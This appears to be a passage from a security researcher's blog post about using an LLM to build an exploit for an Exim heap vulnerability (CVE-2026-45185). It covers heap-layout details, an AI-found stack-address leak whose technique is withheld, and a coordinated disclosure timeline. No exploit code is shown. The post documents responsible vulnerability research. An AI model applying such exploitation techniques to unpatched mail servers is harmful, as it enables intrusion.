As I was starting to implement this idea, something happened: I made the most junior mistake an exploit writer can make. When I set up the environment with the LLM, I didn't give it enough information to understand that our final goal was to attack a default installation on the current system. I only mentioned Exim, without specifying the version, so it simply downloaded the latest release instead of getting the package from the apt repository. That difference is crucial: the older version (the one installed on our target system) creates the xfer_buffer after verify_certificate, while in the latest version the order is reversed, which keeps the xfer_buffer from being sandwiched between live objects.

Trying to work with LLMs was, I have to admit, genuinely painful for a while. The raw speed is impressive; that part I won't argue. But as I said earlier, the experience put a very clear mirror in front of me: I had to relearn how to work in this era. And of course, part of that relearning is to stop letting the LLM build its own environment and start handing it a workspace already shaped by me, with the boundaries already in place.

Once the environment was properly set up and configured, though, something genuinely surprised me. I handed the model the script that drove the memory primitives, drew the memory shape I was hunting for — the one we walked through above — and within minutes it came back with the proper memory setup we were looking for.

At this point I asked the LLM to try to leak a pointer using the current heap configuration, giving it complete freedom to find its own way there, with no priming and no bias from me. What surprised me was that it came back with a solution.

The address it leaked, on Linux x86_64, is unmistakably a stack address. The LLM had walked down a path I hadn't even been considering, and, unfortunately, I'm going to step around the technique itself for now, because I haven't been able to confirm whether it is already patched, and a blog post is the wrong place to find out the hard way. What I want to hold on to here is the shape of the moment: a hands-off prompt, no priming, no nudging towards anything I had in mind, and a stack pointer that came back over the wire on the first round-trip.

By the time this leak appeared, it was already late on a Thursday, and I knew the fix was scheduled to ship the following Tuesday. I wanted to spend what was left of the week dumping everything that had happened to me, the feelings, the frustrations, the mistakes, everything I had picked up over the past seven days, and that left me with no real time to push the work any further than this single, modest leak.

I know that for many people, myself included, this lands as a bittersweet result. On one hand, the speed at which I learned things along the way was genuinely impressive. On the other, I came away feeling that I had lost a fair amount of control over what was happening under my own hands, and it is not entirely clear to me whether, for some of these problems, it isn't still simpler to grab the debugger and get one's hands dirty the old way.

Maybe the strategy I went with, leaking a peer-side address as the first step of the exploit, is not the best one, and somebody out there will have a sharper angle on it. Either way, I will be more than happy to see the full implementation of this exploit, written by one of you, in the not-too-distant future.

XBOW Native

The LLM kept working for a while longer and never even got as far as a leak. Honestly, I don't think LLMs alone are quite ready to write exploits against real-world software yet. After this experience I think they can solve something CTF-shaped, but I don't see them reaching the level of real production targets just yet. A perfectly valid counter to all of this is that, with the time I had, I didn't get to a full exploit either. Still, I think I at least won this particular battle: against the actual production build, my side produced a stack address on the wire, and the other side produced nothing.

What this means

LLMs can compress the early stages of vulnerability research. They can help you understand unfamiliar code, generate hypotheses, compare paths, and reach suspicious areas, all faster than ever.

But the hard parts are still hard. You still need taste. You still need skepticism. You still need to debug. You still need to prove exploitability. One thing is certain, though: vulnerability research has found its turbo button.

Timeline

Date - Event

05/01/2026 - Vulnerability submitted to security@exim.org

05/05/2026 - Maintainers acknowledged the vulnerability and mentioned they had a fix in their private repo

05/08/2026 - Exim maintainers notified the distros

05/10/2026 - Restricted access provided to the distros

05/10/2026 - CVE-2026-45185 assigned

05/12/2026 - Public release and coordinated distro release

References

https://www.openwall.com/lists/oss-security/2026/05/12/4
